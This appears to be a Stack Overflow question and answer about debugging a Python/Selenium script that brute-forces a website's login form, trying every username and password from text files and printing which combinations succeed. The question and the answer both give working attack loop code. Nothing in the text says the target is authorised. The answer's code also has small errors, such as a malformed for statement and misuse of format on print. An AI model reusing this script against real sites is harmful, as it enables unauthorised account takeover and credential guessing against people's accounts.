# Python-Selenium - Brute force script using nested For loops for username and password list

Tags: python, selenium, security, selenium-webdriver, brute-force

I am new to Python and am trying to create a brute force script using Python and Selenium to brute force a website using usernames and passwords from a text file. The issue I am facing is that the script takes the first username and runs it against the password list and then it stops.

I have tried iterating in lists, nested for loops and even calling the function with usernames manually presented for testing but still the logic only picks the first user name and then once the password list end is reached the application finishes.

Any help would be highly appreciated.

```
user_list = open('usernamelist.txt' , 'r')  #File containing usernames
pass_list = open('passwordlist.txt' , 'r')  #File containing passwords


for usernm in user_list:
    drv.get(target-website-url)
    for passwd in pass_list:
        username = drv.find_element_by_xpath("/html/body/div/ui-view/ui-view/div/div/div/div/div[3]/ui-view/div/form/div[1]/input")
        username.send_keys(usernm.split())
        password = drv.find_element_by_xpath("/html/body/div/ui-view/ui-view/div/div/div/div/div[3]/ui-view/div/form/div[2]/input")
        password.send_keys(passwd.split())
        submit = drv.find_element_by_xpath('//*[@id="loginButton"]')
        submit.click()
        time.sleep(1)
        drv.refresh()

        #To check for a successful or failed login using the current URL
        login_fail = drv.current_url
        if "redirect" in login_fail:
            print("User" + usernm + " and " + passwd + " combo FAILED")
        elif "dashboard" in login_fail:
            print("User" + usernm + " and " + passwd + " combo SUCCEEDED")
        drv.refresh()
        time.sleep(2)
```

Answer (score 1):

I would suggest using zip function, that returns an iterator out of those two lists:

```
username = drv.find_element_by_xpath('/html/body/div/ui-view/uiview/div/div/div/div/div[3]/ui-view/div/form/div[1]/input')
password = drv.find_element_by_xpath('/html/body/div/ui-view/ui-view/div/div/div/div/div[3]/ui-view/div/form/div[2]/input')

for user user_list:
    for passw in pass_list:
        username.send_keys(user.strip()) # .strip() for removing \r and \n
        password.send_keys(passw.strip()) # .strip() for removing \r and \n

        submit = drv.find_element_by_xpath('//*[@id="loginButton"]')
        submit.click()
        time.sleep(2)

        login_fail = drv.find_element_by_class_name("appInfoBox__header")
        login_failure = (login_fail.get_attribute("innerHTML"))

        if "Login error" in login_failure:
            print("{user} and {passw} combo FAILED").format(
                user = user,
                passw = passw
            )
        else:
            print("{user} and {passw} combo SUCCEEDED").format(
                user = user,
                passw = passw
            )

        drv.refresh()
        time.sleep(2)
```

Because in your case the code iterates over all of the usernames sends them to the specified element and then iterates over password and sends them to the other element, that is why it shows as in one line:

```
for usernm in user_list:
    username = drv.find_element_by_xpath('xpath')
    username.send_keys(usernm)

for passwd in pass_list:
     password = drv.find_element_by_xpath('xpath')
     password.send_keys(passwd)
```

Comment: Seems to be getting there, it has picked up the first username and runs it with all the passwords but once the password list is done it isn't moving to the next username in the text file and just refreshes. I am new to Python and have tried a lot of combinations with the code you have kindly provided as well in the meantime. But the one above works best with just the issue of not moving onto the next username from the list.

Comment: I have just updated the question with the new code and details, apart from it I had tried with the lists and files and using multiple functions and even running the function manually with multiple user names but for some reason it stops after the first user name. It does it correctly till the first one and even a continue in the nested for loop isn't helping.